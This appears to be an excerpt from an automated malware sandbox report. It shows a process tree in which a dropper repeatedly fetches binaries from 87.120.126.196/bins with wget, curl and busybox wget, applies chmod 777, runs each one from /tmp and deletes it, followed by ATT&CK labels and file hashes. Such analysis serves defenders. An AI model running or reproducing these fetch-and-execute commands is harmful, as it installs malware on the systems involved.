/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:930
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:936
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:942
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:948
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:954
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:960
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:966
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:972
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97